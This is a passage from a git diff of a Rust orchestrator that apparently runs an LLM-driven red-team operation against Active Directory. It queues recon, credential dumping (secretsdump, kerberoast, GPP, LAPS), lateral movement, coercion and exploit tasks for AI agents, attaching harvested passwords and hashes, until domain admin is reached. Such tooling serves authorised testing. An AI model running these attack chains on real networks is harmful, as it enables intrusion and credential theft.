usize) -> Self { + Self { + inner: Arc::new(Mutex::new(HashMap::new())), + max_per_credential, + } + } + + /// Try to acquire a slot. Returns `true` if under the limit.
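+ /// + /// Every successful acquire must be paired with a release() when the task + /// finishes; submit_to_llm does this at the end of its spawned task.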
+ pub async fn try_acquire(&self, key: &str) -> bool { + let mut map = self.inner.lock().await; + let count = map.entry(key.to_string()).or_insert(0); + if *count < self.max_per_credential { + *count += 1; + true + } else { + false + } + } + + /// Check if a slot is available WITHOUT acquiring it. + pub async fn can_acquire(&self, key: &str) -> bool { + let map = self.inner.lock().await; + match map.get(key) { + Some(count) => *count < self.max_per_credential, + None => true, + } + } + + /// Release a slot when the task completes (success or failure). + pub async fn release(&self, key: &str) { + let mut map = self.inner.lock().await; + if let Some(count) = map.get_mut(key) { + *count = count.saturating_sub(1); + if *count == 0 { + map.remove(key); + } + } + } +} + +/// Extract `"user@domain"` from a task payload's `credential` field. +pub fn credential_key_from_payload(payload: &serde_json::Value) -> Option<String> { + let cred = payload.get("credential")?; + let username = cred.get("username").and_then(|v| v.as_str())?; + let domain = cred.get("domain").and_then(|v| v.as_str()).unwrap_or(""); + Some(format!("{}@{}", username, domain)) +} + +/// Central dispatcher for submitting tasks with throttling and routing. +pub struct Dispatcher { + pub queue: TaskQueue, + pub tracker: ActiveTaskTracker, + pub throttler: Arc<Throttler>, + pub deferred: Arc<DeferredQueue>, + pub state: SharedState, + pub config: Arc<OrchestratorConfig>, + /// YAML config (agent roles, vulnerability priorities, context management). + /// `None` if no YAML config file was found at startup. + pub ares_config: Option<Arc<ares_core::config::AresConfig>>, + /// Notifies auto_credential_access to wake up when new creds arrive. + pub credential_access_notify: Arc<Notify>, + /// Notifies auto_delegation_enumeration to wake up when new creds arrive. + pub delegation_notify: Arc<Notify>, + /// LLM runner — drives tasks through the Rust agent loop. + pub llm_runner: Arc<LlmTaskRunner>, + /// Per-credential concurrency limiter. + pub credential_inflight: CredentialInflight, +} + +impl Dispatcher { + #[allow(clippy::too_many_arguments)] + pub fn new( + queue: TaskQueue, + tracker: ActiveTaskTracker, + throttler: Arc<Throttler>, + deferred: Arc<DeferredQueue>, + state: SharedState, + config: Arc<OrchestratorConfig>, + ares_config: Option<Arc<ares_core::config::AresConfig>>, + llm_runner: Arc<LlmTaskRunner>, + ) -> Self { + Self { + queue, + tracker, + throttler, + deferred, + state, + config, + ares_config, + credential_access_notify: Arc::new(Notify::new()), + delegation_notify: Arc::new(Notify::new()), + llm_runner, + // Allow up to 3 concurrent tasks per credential + credential_inflight: CredentialInflight::new(3), + } + } +} diff --git a/ares-cli/src/orchestrator/dispatcher/submission.rs b/ares-cli/src/orchestrator/dispatcher/submission.rs new file mode 100644 index 00000000..3e132c41 --- /dev/null +++ b/ares-cli/src/orchestrator/dispatcher/submission.rs @@ -0,0 +1,450 @@ +//! Task submission — throttled_submit and do_submit. + +use std::collections::HashMap; +use std::sync::Arc; + +use anyhow::Result; +use chrono::Utc; +use serde_json::{json, Value}; +use tracing::{debug, info, warn}; + +use crate::orchestrator::deferred::DeferredTask; +use crate::orchestrator::llm_runner::LlmTaskRunner; +use crate::orchestrator::routing::ActiveTask; +use crate::orchestrator::task_queue::TaskResult; +use crate::orchestrator::throttling::ThrottleDecision; + +use ares_llm::LoopEndReason; + +use super::Dispatcher; + +impl Dispatcher { + /// Submit a task with throttle checking. Returns the task_id if submitted, + /// None if deferred or rejected.
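+ /// + /// Decision flow: Allow submits immediately via do_submit; Defer parks the + /// task in the Redis-backed deferred queue; Wait(d) sleeps for d, re-checks + /// the throttler once, and then either submits or defers.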
+ pub async fn throttled_submit( + &self, + task_type: &str, + target_role: &str, + payload: serde_json::Value, + priority: i32, + ) -> Result<Option<String>> { + let decision = self + .throttler + .check(task_type, target_role, Some(&payload)) + .await; + + match decision { + ThrottleDecision::Allow => { + self.do_submit(task_type, target_role, payload, priority) + .await + } + ThrottleDecision::Defer => { + let task = DeferredTask { + priority, + enqueue_time: Utc::now().timestamp() as f64, + task_type: task_type.to_string(), + target_role: target_role.to_string(), + payload, + source_agent: "orchestrator".to_string(), + }; + match self.deferred.enqueue(&task).await { + Ok(true) => { + debug!(task_type, target_role, "Task deferred"); + Ok(None) + } + Ok(false) => { + debug!(task_type, target_role, "Deferred queue full, task dropped"); + Ok(None) + } + Err(e) => { + warn!(err = %e, "Failed to defer task, attempting direct submit"); + self.do_submit(task_type, target_role, task.payload, priority) + .await + } + } + } + ThrottleDecision::Wait(dur) => { + // Sleep and retry once + tokio::time::sleep(dur).await; + let retry_decision = self + .throttler + .check(task_type, target_role, Some(&payload)) + .await; + match retry_decision { + ThrottleDecision::Allow => { + self.do_submit(task_type, target_role, payload, priority) + .await + } + _ => { + let task = DeferredTask { + priority, + enqueue_time: Utc::now().timestamp() as f64, + task_type: task_type.to_string(), + target_role: target_role.to_string(), + payload, + source_agent: "orchestrator".to_string(), + }; + let _ = self.deferred.enqueue(&task).await; + Ok(None) + } + } + } + } + } + + /// Direct submit (bypasses throttle). Returns task_id. + /// + /// Routes the task to the Rust LLM agent loop. Prefers `target_role` + /// when it maps to a valid AgentRole (e.g. MSSQL exploit → lateral), + /// falling back to `role_for_task_type` for the default mapping. + pub async fn do_submit( + &self, + task_type: &str, + target_role: &str, + payload: serde_json::Value, + _priority: i32, + ) -> Result<Option<String>> { + // Prefer the caller-specified target_role (from recommended_agent) + // over the static task_type → role mapping. This lets automation + // modules like MSSQL route exploits to lateral instead of privesc. + let role = ares_llm::tool_registry::AgentRole::parse(target_role) + .or_else(|| crate::orchestrator::llm_runner::role_for_task_type(task_type)); + + let role = match role { + Some(r) => r, + None => { + warn!( + task_type = task_type, + target_role = target_role, + "No LLM role mapping for task type or target role, dropping" + ); + return Ok(None); + } + }; + + self.submit_to_llm( + self.llm_runner.clone(), + task_type, + target_role, + role, + payload, + ) + .await + } + + /// Submit a task to the Rust LLM agent loop. Spawns a background tokio + /// task and pushes the result back through the normal result queue so it + /// flows through `process_completed_task()`. + async fn submit_to_llm( + &self, + runner: Arc<LlmTaskRunner>, + task_type: &str, + target_role: &str, + role: ares_llm::tool_registry::AgentRole, + payload: serde_json::Value, + ) -> Result<Option<String>> { + // Per-credential concurrency gate: if too many tasks are already + // in-flight for this credential, defer instead of spawning another.
+ let cred_key = super::credential_key_from_payload(&payload); + if let Some(ref key) = cred_key { + if !self.credential_inflight.try_acquire(key).await { + info!( + credential = key.as_str(), + task_type, "Credential concurrency limit reached, deferring task" + ); + let task = DeferredTask { + priority: 3, + enqueue_time: Utc::now().timestamp() as f64, + task_type: task_type.to_string(), + target_role: target_role.to_string(), + payload, + source_agent: "orchestrator".to_string(), + }; + let _ = self.deferred.enqueue(&task).await; + return Ok(None); + } + } + + let task_id = format!( + "{}_{}", + task_type, + &uuid::Uuid::new_v4().simple().to_string()[..12] + ); + + info!( + task_id = %task_id, + task_type = task_type, + role = target_role, + "Routing task to LLM runner (Rust agent loop)" + ); + + self.tracker + .add(ActiveTask { + task_id: task_id.clone(), + task_type: task_type.to_string(), + role: target_role.to_string(), + submitted_at: std::time::Instant::now(), + }) + .await; + + self.throttler.record_dispatch().await; + + // Set initial task status with full metadata + let _ = self + .queue + .set_task_status_full( + &task_id, + "in_progress", + &self.config.operation_id, + target_role, + task_type, + Some(&payload), + ) + .await; + + // Persist pending task to Redis HASH for recovery + let now = Utc::now(); + let mut task_params: HashMap<String, serde_json::Value> = HashMap::new(); + if let Some(ref key) = cred_key { + task_params.insert("credential_key".to_string(), serde_json::json!(key)); + } + let task_info = ares_core::models::TaskInfo { + task_id: task_id.clone(), + task_type: task_type.to_string(), + assigned_agent: target_role.to_string(), + status: ares_core::models::TaskStatus::InProgress, + created_at: now, + started_at: Some(now), + completed_at: None, + last_activity_at: now, + params: task_params, + result: None, + error: None, + retry_count: 0, + max_retries: 3, + }; + let _ = self.state.track_pending_task(&self.queue, task_info).await; + + // Capture vuln_id from exploit payloads so it survives into the result. + let vuln_id_for_result = payload + .get("vuln_id") + .and_then(|v| v.as_str()) + .map(|s| s.to_string()); + + // Spawn the LLM agent loop as a background task + let queue = self.queue.clone(); + let tid = task_id.clone(); + let tt = task_type.to_string(); + let cred_inflight = self.credential_inflight.clone(); + let cred_key_owned = cred_key.clone(); + tokio::spawn(async move { + let outcome = runner.execute_task(&tt, &tid, role, &payload).await; + + // Token usage is now recorded incrementally per-LLM-call via + // CallbackHandler::on_token_usage — no batch recording needed here. + + // Convert outcome to TaskResult and push to result queue + let mut result = match outcome { + Ok(outcome) => { + // Merge all structured discoveries from tool results + let merged_discoveries = if outcome.discoveries.is_empty() { + None + } else { + Some(ares_tools::parsers::merge_discoveries(&outcome.discoveries)) + }; + + // Collect raw tool outputs for secondary regex extraction + let tool_outputs_json: Vec<Value> = outcome + .tool_outputs + .iter() + .map(|s| Value::String(s.clone())) + .collect(); + + match &outcome.reason { + LoopEndReason::TaskComplete { result, .. } => { + // The result may be a JSON string (serialized object from + // the LLM) or plain text. If it parses as JSON, merge its + // fields into the result payload so extract_discoveries() + // can find any LLM-reported hosts/credentials.
+ let mut result_json = + if let Ok(parsed) = serde_json::from_str::<Value>(result) { + if parsed.is_object() { + let mut obj = parsed; + obj["steps"] = json!(outcome.steps); + obj["tool_calls"] = json!(outcome.tool_calls_dispatched); + obj + } else { + json!({ + "summary": result, + "steps": outcome.steps, + "tool_calls": outcome.tool_calls_dispatched, + }) + } + } else { + json!({ + "summary": result, + "steps": outcome.steps, + "tool_calls": outcome.tool_calls_dispatched, + }) + }; + // Overwrite "discoveries" with parser-extracted data only. + // The LLM's task_complete result is untrusted prose — + // any discovery-like keys it contains are ignored. + // Only ares-tools parsers (run on real tool stdout) + // produce authoritative discoveries. + if let Some(obj) = result_json.as_object_mut() { + obj.remove("discoveries"); + } + if let Some(disc) = merged_discoveries { + result_json["discoveries"] = disc; + } + if !tool_outputs_json.is_empty() { + result_json["tool_outputs"] = + Value::Array(tool_outputs_json.clone()); + } + TaskResult { + task_id: tid.clone(), + success: true, + result: Some(result_json), + error: None, + completed_at: Some(Utc::now()), + worker_pod: Some("rust-llm-runner".into()), + agent_name: Some(tt.clone()), + } + } + LoopEndReason::RequestAssistance { issue, context } => { + let mut result_json = json!({ + "steps": outcome.steps, + "tool_calls": outcome.tool_calls_dispatched, + }); + if let Some(disc) = merged_discoveries { + result_json["discoveries"] = disc; + } + if !tool_outputs_json.is_empty() { + result_json["tool_outputs"] = + Value::Array(tool_outputs_json.clone()); + } + TaskResult { + task_id: tid.clone(), + success: false, + result: Some(result_json), + error: Some(format!( + "Assistance needed: {issue} (context: {context})" + )), + completed_at: Some(Utc::now()), + worker_pod: Some("rust-llm-runner".into()), + agent_name: Some(tt.clone()), + } + } + LoopEndReason::MaxSteps => { + let mut result_json = json!({ + "steps": outcome.steps, + "tool_calls": outcome.tool_calls_dispatched, + }); + if let Some(disc) = merged_discoveries { + result_json["discoveries"] = disc; + } + if !tool_outputs_json.is_empty() { + result_json["tool_outputs"] = + Value::Array(tool_outputs_json.clone()); + } + TaskResult { + task_id: tid.clone(), + success: false, + result: Some(result_json), + error: Some("Agent hit max steps limit".into()), + completed_at: Some(Utc::now()), + worker_pod: Some("rust-llm-runner".into()), + agent_name: Some(tt.clone()), + } + } + LoopEndReason::EndTurn { content } => { + let mut result_json = json!({"summary": content}); + if let Some(disc) = merged_discoveries { + result_json["discoveries"] = disc; + } + if !tool_outputs_json.is_empty() { + result_json["tool_outputs"] = + Value::Array(tool_outputs_json.clone()); + } + TaskResult { + task_id: tid.clone(), + success: true, + result: Some(result_json), + error: None, + completed_at: Some(Utc::now()), + worker_pod: Some("rust-llm-runner".into()), + agent_name: Some(tt.clone()), + } + } + LoopEndReason::MaxTokens => { + let mut result_json = json!({ + "steps": outcome.steps, + "tool_calls": outcome.tool_calls_dispatched, + }); + if let Some(disc) = merged_discoveries { + result_json["discoveries"] = disc; + } + if !tool_outputs_json.is_empty() { + result_json["tool_outputs"] = + Value::Array(tool_outputs_json.clone()); + } + TaskResult { + task_id: tid.clone(), + success: false, + result: Some(result_json), + error: Some("Agent hit max tokens".into()), + completed_at: Some(Utc::now()), + worker_pod:
Some("rust-llm-runner".into()), + agent_name: Some(tt.clone()), + } + } + LoopEndReason::Error(err) => TaskResult { + task_id: tid.clone(), + success: false, + result: None, + error: Some(err.clone()), + completed_at: Some(Utc::now()), + worker_pod: Some("rust-llm-runner".into()), + agent_name: Some(tt.clone()), + }, + } + } + Err(e) => TaskResult { + task_id: tid.clone(), + success: false, + result: None, + error: Some(format!("LLM runner error: {e}")), + completed_at: Some(Utc::now()), + worker_pod: Some("rust-llm-runner".into()), + agent_name: Some(tt.clone()), + }, + }; + + // Inject vuln_id into result so process_completed_task can mark_exploited. + if let Some(ref vid) = vuln_id_for_result { + if let Some(ref mut res) = result.result { + if let Some(obj) = res.as_object_mut() { + obj.insert("vuln_id".to_string(), json!(vid)); + } + } + } + + // Release per-credential concurrency slot + if let Some(ref key) = cred_key_owned { + cred_inflight.release(key).await; + } + + // Push result to the normal result queue so the result consumer picks it up + if let Err(e) = queue.send_result(&tid, &result).await { + warn!( + task_id = %tid, + err = %e, + "Failed to push LLM task result to Redis" + ); + } + }); + + Ok(Some(task_id)) + } +} diff --git a/ares-cli/src/orchestrator/dispatcher/task_builders.rs b/ares-cli/src/orchestrator/dispatcher/task_builders.rs new file mode 100644 index 00000000..1c04f2f8 --- /dev/null +++ b/ares-cli/src/orchestrator/dispatcher/task_builders.rs @@ -0,0 +1,463 @@ +//! Convenience methods for common task types (request_crack, request_recon, etc.). + +use anyhow::Result; +use serde_json::json; +use tracing::{debug, info}; + +use crate::orchestrator::state::DEDUP_SCANNED_TARGETS; + +use super::Dispatcher; + +impl Dispatcher { + /// Submit a crack task for a hash. + pub async fn request_crack(&self, hash: &ares_core::models::Hash) -> Result> { + let payload = json!({ + "hash_type": hash.hash_type, + "hash_value": hash.hash_value, + "username": hash.username, + "domain": hash.domain, + }); + // Crack tasks are non-LLM, normal priority + self.throttled_submit("crack", "cracker", payload, 5).await + } + + /// Submit a recon task. + /// + /// Guards (mirroring Python's `request_recon` in `routing.py`): + /// 1. Skip entirely if domain admin has been achieved + /// 2. Skip nmap tasks if all targets are already in `scanned_targets` + /// 3. 
Auto-dispatch nmap prerequisite before enumeration if targets not scanned + pub async fn request_recon( + &self, + target_ip: &str, + domain: &str, + techniques: &[&str], + credential: Option<&ares_core::models::Credential>, + ) -> Result<Option<String>> { + // Guard 1: Skip recon if domain admin already achieved + { + let state = self.state.read().await; + if state.has_domain_admin { + debug!( + target_ip = target_ip, + "Skipping recon — domain admin already achieved" + ); + return Ok(None); + } + } + + let is_nmap = techniques.contains(&"network_scan") || techniques.contains(&"nmap_scan"); + let is_smb_signing = techniques.contains(&"smb_signing_check"); + let is_scan_only = (is_nmap || is_smb_signing) + && techniques + .iter() + .all(|t| *t == "network_scan" || *t == "nmap_scan" || *t == "smb_signing_check"); + + // Guard 2: Skip nmap/scan tasks if target already scanned + if is_scan_only { + let state = self.state.read().await; + if state.is_processed(DEDUP_SCANNED_TARGETS, target_ip) { + debug!( + target_ip = target_ip, + "Skipping scan — target already in scanned_targets" + ); + return Ok(None); + } + } + + // Guard 3: Auto-dispatch nmap prerequisite before enumeration + // If this is NOT a scan task and the target hasn't been scanned yet, + // dispatch an nmap scan first at priority 1 (urgent). + if !is_scan_only { + let needs_scan = { + let state = self.state.read().await; + !state.is_processed(DEDUP_SCANNED_TARGETS, target_ip) + }; + if needs_scan { + info!( + target_ip = target_ip, + "Auto-dispatching nmap prerequisite before enumeration" + ); + let scan_payload = json!({ + "target_ip": target_ip, + "domain": domain, + "techniques": ["network_scan", "smb_signing_check"], + }); + // Priority 1 = urgent, scanned before the enumeration task + let _ = self + .throttled_submit("recon", "recon", scan_payload, 1) + .await; + } + } + + // Mark nmap targets as scanned (optimistic, to prevent duplicate dispatches) + if is_nmap { + { + let mut state = self.state.write().await; + state.mark_processed(DEDUP_SCANNED_TARGETS, target_ip.to_string()); + } + // Persist to Redis so it survives restarts + let _ = self + .state + .persist_dedup(&self.queue, DEDUP_SCANNED_TARGETS, target_ip) + .await; + } + + let mut payload = json!({ + "target_ip": target_ip, + "domain": domain, + "techniques": techniques, + }); + if let Some(cred) = credential { + payload["credential"] = json!({ + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }); + } + + // Nmap tasks get priority 1, other recon priority 5 + let priority = if is_nmap { 1 } else { 5 }; + self.throttled_submit("recon", "recon", payload, priority) + .await + } + + /// Submit a low-hanging fruit credential discovery task (SYSVOL, GPP, LDAP, LAPS). + /// + /// Mirrors Python's fast credential discovery dispatch: sends multiple high-success-rate + /// techniques in a single task so the LLM agent executes them sequentially.
+ pub async fn request_low_hanging_fruit( + &self, + target_ip: &str, + domain: &str, + credential: &ares_core::models::Credential, + priority: i32, + ) -> Result<Option<String>> { + let payload = json!({ + "techniques": [ + "sysvol_script_search", + "gpp_password_finder", + "ldap_search_descriptions", + "laps_dump" + ], + "reason": "low_hanging_fruit", + "target_ip": target_ip, + "domain": domain, + "credential": { + "username": credential.username, + "password": credential.password, + "domain": credential.domain, + }, + }); + self.throttled_submit("credential_access", "credential_access", payload, priority) + .await + } + + /// Submit a credential access task (kerberoast, asrep, secretsdump, etc.). + pub async fn request_credential_access( + &self, + technique: &str, + target_ip: &str, + domain: &str, + credential: &ares_core::models::Credential, + priority: i32, + ) -> Result<Option<String>> { + let payload = json!({ + "technique": technique, + "target_ip": target_ip, + "domain": domain, + "credential": { + "username": credential.username, + "password": credential.password, + "domain": credential.domain, + }, + }); + self.throttled_submit("credential_access", "credential_access", payload, priority) + .await + } + + /// Submit a secretsdump task. + pub async fn request_secretsdump( + &self, + target_ip: &str, + credential: &ares_core::models::Credential, + priority: i32, + ) -> Result<Option<String>> { + let payload = json!({ + "technique": "secretsdump", + "target_ip": target_ip, + "credential": { + "username": credential.username, + "password": credential.password, + "domain": credential.domain, + }, + }); + self.throttled_submit("credential_access", "credential_access", payload, priority) + .await + } + + /// Submit a lateral movement task. + pub async fn request_lateral( + &self, + target_ip: &str, + credential: &ares_core::models::Credential, + technique: &str, + ) -> Result<Option<String>> { + let payload = json!({ + "technique": technique, + "target_ip": target_ip, + "credential": { + "username": credential.username, + "password": credential.password, + "domain": credential.domain, + }, + }); + self.throttled_submit("lateral_movement", "lateral", payload, 5) + .await + } + + /// Submit an exploit task for a vulnerability. + /// + /// Looks up the best available credential or hash for the vuln's target/domain + /// and attaches it to the payload so the agent doesn't have to discover auth independently.
+ pub async fn request_exploit( + &self, + vuln: &ares_core::models::VulnerabilityInfo, + priority: i32, + ) -> Result<Option<String>> { + let mut payload = json!({ + "vuln_id": vuln.vuln_id, + "vuln_type": vuln.vuln_type, + "target": vuln.target, + "details": vuln.details, + }); + + // Look up credentials for this exploit from state + { + let state = self.state.read().await; + + // Try account_name from vuln details first, then fall back to any cred for the target domain + let account_name = vuln + .details + .get("account_name") + .and_then(|v| v.as_str()) + .or_else(|| vuln.details.get("AccountName").and_then(|v| v.as_str())); + + let domain = vuln + .details + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or(""); + + // Try to find a matching credential + let cred = if let Some(acct) = account_name { + state + .credentials + .iter() + .find(|c| c.username.to_lowercase() == acct.to_lowercase()) + } else { + None + } + .or_else(|| { + // Fall back to any non-delegation credential for the vuln's domain + if !domain.is_empty() { + state.credentials.iter().find(|c| { + c.domain.to_lowercase() == domain.to_lowercase() + && !state.is_delegation_account(&c.username) + }) + } else { + // Fall back to first available non-delegation credential + state + .credentials + .iter() + .find(|c| !state.is_delegation_account(&c.username)) + } + }); + + if let Some(cred) = cred { + payload["credential"] = json!({ + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }); + } + + // For MSSQL vulns, include ALL available credentials for the domain + // so the LLM can try each one (different users have different MSSQL + // permissions — e.g. sam.wilson can EXECUTE AS LOGIN = 'sa'). + if vuln.vuln_type.starts_with("mssql") && !domain.is_empty() { + let all_creds: Vec<_> = state + .credentials + .iter() + .filter(|c| { + c.domain.to_lowercase() == domain.to_lowercase() + && !state.is_delegation_account(&c.username) + }) + .map(|c| { + json!({ + "username": c.username, + "password": c.password, + "domain": c.domain, + }) + }) + .collect(); + if all_creds.len() > 1 { + payload["all_credentials"] = json!(all_creds); + } + } + + // Also attach a hash if available for the account + if let Some(acct) = account_name { + if let Some(hash) = state + .hashes + .iter() + .find(|h| h.username.to_lowercase() == acct.to_lowercase()) + { + payload["hash"] = json!(hash.hash_value); + payload["hash_username"] = json!(hash.username); + if let Some(ref aes) = hash.aes_key { + payload["aes_key"] = json!(aes); + } + } + } + } + + let role = if vuln.recommended_agent.is_empty() { + "privesc" + } else { + &vuln.recommended_agent + }; + self.throttled_submit("exploit", role, payload, priority) + .await + } + + /// Submit a BloodHound collection task. + pub async fn request_bloodhound( + &self, + domain: &str, + dc_ip: &str, + credential: &ares_core::models::Credential, + ) -> Result<Option<String>> { + let payload = json!({ + "technique": "bloodhound_collect", + "domain": domain, + "target_ip": dc_ip, + "credential": { + "username": credential.username, + "password": credential.password, + "domain": credential.domain, + }, + }); + self.throttled_submit("recon", "recon", payload, 7).await + } + + /// Submit a delegation enumeration task.
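+ /// + /// Dispatched as a privesc_enumeration task on the recon role; discovered + /// delegation vulns are exploited by the s4u automation rather than the + /// generic exploitation workflow.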
+ pub async fn request_delegation_enum( + &self, + domain: &str, + dc_ip: &str, + credential: &ares_core::models::Credential, + ) -> Result<Option<String>> { + let payload = json!({ + "technique": "find_delegation", + "domain": domain, + "target_ip": dc_ip, + "credential": { + "username": credential.username, + "password": credential.password, + "domain": credential.domain, + }, + }); + self.throttled_submit("privesc_enumeration", "recon", payload, 5) + .await + } + + /// Submit a share enumeration task against a host using credentials. + pub async fn request_share_enumeration( + &self, + host_ip: &str, + credential: &ares_core::models::Credential, + ) -> Result<Option<String>> { + let payload = json!({ + "techniques": ["enumerate_shares"], + "target_ip": host_ip, + "credential": { + "username": credential.username, + "password": credential.password, + "domain": credential.domain, + }, + }); + self.throttled_submit("recon", "recon", payload, 5).await + } + + /// Submit a share spider task. + pub async fn request_share_spider( + &self, + host_ip: &str, + share_name: &str, + credential: &ares_core::models::Credential, + ) -> Result<Option<String>> { + let payload = json!({ + "technique": "share_spider", + "target_ip": host_ip, + "share_name": share_name, + "credential": { + "username": credential.username, + "password": credential.password, + "domain": credential.domain, + }, + }); + self.throttled_submit("credential_access", "credential_access", payload, 8) + .await + } + + /// Submit a coercion task. + pub async fn request_coercion( + &self, + target_ip: &str, + listener_ip: &str, + techniques: &[&str], + ) -> Result<Option<String>> { + let payload = json!({ + "target_ip": target_ip, + "listener_ip": listener_ip, + "techniques": techniques, + }); + self.throttled_submit("coercion", "coercion", payload, 3) + .await + } + + /// Submit a CERTIPY find task for ADCS enumeration. + pub async fn request_certipy_find( + &self, + target_ip: &str, + domain: &str, + credential: &ares_core::models::Credential, + ) -> Result<Option<String>> { + let payload = json!({ + "technique": "certipy_find", + "target_ip": target_ip, + "domain": domain, + "credential": { + "username": credential.username, + "password": credential.password, + "domain": credential.domain, + }, + }); + self.throttled_submit("recon", "recon", payload, 4).await + } + + /// Refresh the operation lock TTL. Called periodically. + pub async fn extend_lock(&self) -> Result<()> { + let op_id = self.state.operation_id().await; + self.queue.extend_lock(&op_id, self.config.lock_ttl).await?; + Ok(()) + } + + /// Publish a state update notification via Redis PubSub. + pub async fn notify_state_update(&self) -> Result<()> { + let op_id = self.state.operation_id().await; + self.queue.publish_state_update(&op_id).await?; + Ok(()) + } +} diff --git a/ares-cli/src/orchestrator/exploitation.rs b/ares-cli/src/orchestrator/exploitation.rs new file mode 100644 index 00000000..5bf0d79f --- /dev/null +++ b/ares-cli/src/orchestrator/exploitation.rs @@ -0,0 +1,196 @@ +//! Exploitation workflow — semaphore-gated exploit dispatch. +//! +//! Mirrors the Python `exploitation_workflow` background task that dequeues +//! vulnerabilities from a Redis ZSET and dispatches exploit tasks with +//! concurrency limited to 3 simultaneous exploits.
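+//! +//! Failed or throttled dispatches are re-enqueued and guarded by a 120-second +//! per-vuln cooldown; a vulnerability only leaves the queue permanently once +//! result processing marks it exploited.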
+ +use std::collections::HashMap; +use std::sync::Arc; +use std::time::Duration; + +use anyhow::Result; +use redis::AsyncCommands; +use tokio::sync::{watch, Semaphore}; +use tokio::time::Instant; +use tracing::{debug, info, warn}; + +use ares_core::models::VulnerabilityInfo; + +use crate::orchestrator::dispatcher::Dispatcher; + +/// Cooldown before re-dispatching a failed exploit for the same vulnerability. +const EXPLOIT_RETRY_COOLDOWN: Duration = Duration::from_secs(120); + +/// Maximum concurrent exploit tasks. +const MAX_CONCURRENT_EXPLOITS: usize = 3; + +/// Spawn the exploitation workflow background task. +/// +/// Continuously pops vulnerabilities from the priority ZSET and dispatches +/// exploit tasks, respecting a semaphore limit. +pub async fn exploitation_workflow( + dispatcher: Arc<Dispatcher>, + mut shutdown: watch::Receiver<bool>, +) { + let semaphore = Arc::new(Semaphore::new(MAX_CONCURRENT_EXPLOITS)); + let mut interval = tokio::time::interval(Duration::from_secs(5)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + // Track dispatch times locally to allow retry after cooldown. + // Unlike `exploited_vulnerabilities` (permanent), this only prevents + // rapid re-dispatch within the same session. + let mut dispatched_at: HashMap<String, Instant> = HashMap::new(); + + info!("Exploitation workflow started (max concurrent: {MAX_CONCURRENT_EXPLOITS})"); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + // Check if we have domain admin — stop exploiting once achieved + { + let state = dispatcher.state.read().await; + if state.has_domain_admin { + debug!("Domain admin achieved — exploitation workflow idle"); + continue; + } + } + + // Try to pop the highest-priority vuln from the ZSET + match pop_next_vuln(&dispatcher).await { + Ok(Some(vuln)) => { + // Skip delegation vulns — s4u.rs handles these with proper + // credential checking and lockout-aware dispatch. The generic + // exploitation path falls back to wrong credentials and + // produces LLM errors with missing target_spn.
+ { + let vtype = vuln.vuln_type.to_lowercase(); + if vtype == "constrained_delegation" + || vtype == "unconstrained_delegation" + || vtype == "rbcd" + { + debug!( + vuln_id = %vuln.vuln_id, + vuln_type = %vuln.vuln_type, + "Skipping delegation vuln (handled by s4u automation)" + ); + continue; + } + } + + // Check if permanently marked exploited (set by result processing on success) + { + let state = dispatcher.state.read().await; + if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { + debug!(vuln_id = %vuln.vuln_id, "Already exploited, skipping"); + continue; + } + } + + // Check dispatch cooldown to prevent rapid re-dispatch + if let Some(last) = dispatched_at.get(&vuln.vuln_id) { + if last.elapsed() < EXPLOIT_RETRY_COOLDOWN { + // Still in cooldown — re-enqueue for later + let _ = requeue_vuln(&dispatcher, &vuln).await; + continue; + } + } + + // Acquire semaphore permit + let permit = match semaphore.clone().try_acquire_owned() { + Ok(p) => p, + Err(_) => { + // At capacity — re-enqueue and wait + let _ = requeue_vuln(&dispatcher, &vuln).await; + debug!("Exploit semaphore full, waiting"); + tokio::time::sleep(Duration::from_secs(2)).await; + continue; + } + }; + + let vuln_id = vuln.vuln_id.clone(); + let vuln_type = vuln.vuln_type.clone(); + let disp = dispatcher.clone(); + + // Record dispatch time for cooldown tracking + dispatched_at.insert(vuln_id.clone(), Instant::now()); + + // Spawn exploit task (does not block the main loop) + tokio::spawn(async move { + let _permit = permit; // held until this task completes + + match disp.request_exploit(&vuln, vuln.priority).await { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + vuln_id = %vuln_id, + vuln_type = %vuln_type, + "Exploit dispatched" + ); + // Re-enqueue with lower priority so the vuln survives + // task failures. The cooldown timer prevents immediate + // re-dispatch, and mark_exploited (called on success in + // result_processing) prevents re-dispatch after success. + let mut retry_vuln = vuln.clone(); + retry_vuln.priority = (vuln.priority + 2).min(10); + let _ = requeue_vuln(&disp, &retry_vuln).await; + } + Ok(None) => { + debug!(vuln_id = %vuln_id, "Exploit deferred by throttler"); + // Re-enqueue for later + let _ = requeue_vuln(&disp, &vuln).await; + } + Err(e) => { + warn!(err = %e, vuln_id = %vuln_id, "Failed to dispatch exploit"); + let _ = requeue_vuln(&disp, &vuln).await; + } + } + }); + } + Ok(None) => { + // No vulns in queue + } + Err(e) => { + warn!(err = %e, "Failed to pop vulnerability from queue"); + } + } + } +} + +/// Pop the lowest-score (highest-priority) vulnerability from the ZSET. +async fn pop_next_vuln(dispatcher: &Dispatcher) -> Result<Option<VulnerabilityInfo>> { + let key = dispatcher.state.vuln_queue_key().await; + let mut conn = dispatcher.queue.connection(); + + // ZPOPMIN returns the member with the lowest score + let result: Vec<(String, f64)> = redis::cmd("ZPOPMIN") + .arg(&key) + .arg(1) + .query_async(&mut conn) + .await + .unwrap_or_default(); + + match result.into_iter().next() { + Some((json, _score)) => { + let vuln: VulnerabilityInfo = + serde_json::from_str(&json).map_err(|e| anyhow::anyhow!("Bad vuln JSON: {e}"))?; + Ok(Some(vuln)) + } + None => Ok(None), + } +} + +/// Re-enqueue a vulnerability into the ZSET (e.g., after throttle rejection).
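+/// +/// The vuln's priority doubles as the ZSET score, so the ZPOPMIN in +/// pop_next_vuln always yields the lowest-numbered (most urgent) priority first.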
